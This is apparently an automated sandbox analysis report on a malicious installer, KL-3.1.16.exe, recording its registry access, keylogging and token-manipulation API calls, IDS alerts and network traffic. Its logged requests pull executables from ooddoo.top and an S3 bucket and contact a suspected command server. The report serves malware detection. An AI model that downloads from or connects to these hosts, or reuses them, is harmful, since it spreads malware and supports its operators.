Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: 5ar6QsR4e.exe, 00000012.00000003.2387351335.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000003.2434916661.0000000000820000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: 5ar6QsR4e.exe, 00000012.00000003.2387351335.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000003.2434916661.0000000000820000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmp

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF2E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

33_2_06CF2E2C

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49735 -> 104.21.81.224:80
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49750 -> 104.21.81.224:443
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49744 -> 104.21.81.224:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 104.21.81.224:443 -> 192.168.2.6:49750

Source: global traffic

TCP traffic: 192.168.2.6:49771 -> 143.92.60.116:25445

Source: unknown	TCP traffic detected without corresponding DNS query: 143.92.60.116
Source: unknown	TCP traffic detected without corresponding DNS query: 143.92.60.116
Source: unknown	TCP traffic detected without corresponding DNS query: 143.92.60.116
Source: unknown	TCP traffic detected without corresponding DNS query: 143.92.60.116
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF67CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,

33_2_06CF67CC

Source: global traffic	HTTP traffic detected: GET /abc/15.exe HTTP/1.1Accept: /User-Agent: Setup Factory 9.0Connection: Keep-AliveCache-Control: no-cacheHost: ooddoo.top
Source: global traffic	HTTP traffic detected: GET /abc/16.exe HTTP/1.1Accept: /User-Agent: Setup Factory 9.0Connection: Keep-AliveCache-Control: no-cacheHost: ooddoo.top
Source: global traffic	HTTP traffic detected: GET /abc/15.exe HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /abc/16.exe HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: ooddoo.top

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 15:07:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGXmr7o9zQZG%2BZQgHg3wvICumi5LhPKkI9TUqC1jzaTlo7Y16KWNl5f1CwaOYruKiTBnoMqE0kSq1EWpqYkAskXXYQ9hHk8BBvQBGYaZpvZVNbwcl7c%2FeSxTHiNN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9ab301f9a10f42-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1476&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=753&delivery_rate=1951871&cwnd=180&unsent_bytes=0&cid=7ecfbd2482096e1f&ts=919&x=0"

Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: irsetup.exe, 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtMozilla/4.0
Source: irsetup.exe, 00000002.00000003.2115477987.0000000004BED000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.152.151/abc/
Source: powershell.exe, 0000000C.00000002.2238695138.0000019D3E3B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2530159061.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: irsetup.exe, 00000002.00000003.2131342981.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000C.00000002.2255780441.0000019D4FD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2255780441.0000019D4FED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2240052551.0000019D416E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2521125684.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2495816920.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: KL-3.1.16.exe, 00000000.00000002.2237266119.00000000028D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/
Source: irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4637507954.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4637507954.0000000000946000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/15.exe
Source: irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/15.exe0
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4646137288.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E20000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/16.exe
Source: irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/16.exeL
Source: irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/16.exeX
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/16.exebX
Source: irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/16.exel
Source: powershell.exe, 00000019.00000002.2432143773.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2416175038.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2240052551.0000019D3FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2442918374.000000000527E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2432510205.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2434963175.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2432143773.0000000005441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2240052551.0000019D411D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.2432143773.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2416175038.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: KL-3.1.16.exe, 00000000.00000002.2237266119.00000000028D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.indigorose.com
Source: KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000000.2113408849.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000002.4652583327.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buy
Source: KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000000.2113408849.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000002.4652583327.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buyd
Source: powershell.exe, 00000016.00000002.2526027201.0000000007822000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000C.00000002.2258796359.0000019D58146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: irsetup.exe, 00000002.00000003.2115477987.0000000004BED000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.yourcompany.com
Source: powershell.exe, 0000000C.00000002.2240052551.0000019D3FD21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000013.00000002.2442918374.000000000527E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2432510205.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2434963175.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2432143773.0000000005441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.2432143773.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2416175038.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.2255780441.0000019D4FD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2255780441.0000019D4FED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2240052551.0000019D416E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2521125684.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2495816920.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2513401129.00000000064A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.2240052551.0000019D411D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000C.00000002.2240052551.0000019D411D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/
Source: irsetup.exe, 00000002.00000002.4637507954.0000000000946000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/15.exe
Source: irsetup.exe, 00000002.00000002.4637507954.0000000000946000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/15.exeLocal
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4646137288.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E20000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/16.exe
Source: irsetup.exe, 00000002.00000002.4646137288.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2383968529.0000000004E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/16.exekX
Source: irsetup.exe, 00000002.00000003.2115477987.0000000004BED000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4644080791.0000000002650000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4645133676.0000000003880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown

HTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.6:49744 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: <BackSpace>		33_2_06CF2BF0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: <Enter>		33_2_06CF2BF0

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF2BF0 CreateMutexA,WaitForSingleObject,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlenA,lstrcatA,lstrcatA,

33_2_06CF2BF0

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06D0ABEF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

33_2_06D0ABEF

Source: powershell.exe	Process created: 76
Source: conhost.exe	Process created: 61
Source: cmd.exe	Process created: 49

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

Process Stats: CPU usage > 49%

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF5792 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

33_2_06CF5792

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CF628E WinExec,WinExec,WinExec,WinExec,Sleep,ExitWindowsEx,		33_2_06CF628E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CF39EC ExitWindowsEx,		33_2_06CF39EC

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\KL-3.1.16.exe	Code function: 0_2_00007FF6F9251C88	0_2_00007FF6F9251C88
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Code function: 0_2_00007FF6F9253D40	0_2_00007FF6F9253D40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026800	2_2_0000000180026800
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180030014	2_2_0000000180030014
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027854	2_2_0000000180027854
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003C0A0	2_2_000000018003C0A0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800218A4	2_2_00000001800218A4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800228CC	2_2_00000001800228CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800308FC	2_2_00000001800308FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800310FC	2_2_00000001800310FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180033914	2_2_0000000180033914
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002B938	2_2_000000018002B938
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002F154	2_2_000000018002F154
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180033220	2_2_0000000180033220
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180024A60	2_2_0000000180024A60
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027268	2_2_0000000180027268
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003029C	2_2_000000018003029C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002A29C	2_2_000000018002A29C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180023AF0	2_2_0000000180023AF0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800352F8	2_2_00000001800352F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180031328	2_2_0000000180031328
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001F34C	2_2_000000018001F34C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003E354	2_2_000000018003E354
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180021B88	2_2_0000000180021B88
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800223CC	2_2_00000001800223CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026BD4	2_2_0000000180026BD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180022BE8	2_2_0000000180022BE8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001EBFC	2_2_000000018001EBFC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180020C38	2_2_0000000180020C38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180034C50	2_2_0000000180034C50
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001E454	2_2_000000018001E454
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002649C	2_2_000000018002649C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800214A8	2_2_00000001800214A8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001F520	2_2_000000018001F520
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001ED40	2_2_000000018001ED40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003CD74	2_2_000000018003CD74
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002759C	2_2_000000018002759C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180008DC0	2_2_0000000180008DC0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800215C4	2_2_00000001800215C4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180037DC8	2_2_0000000180037DC8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800205D8	2_2_00000001800205D8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002A600	2_2_000000018002A600
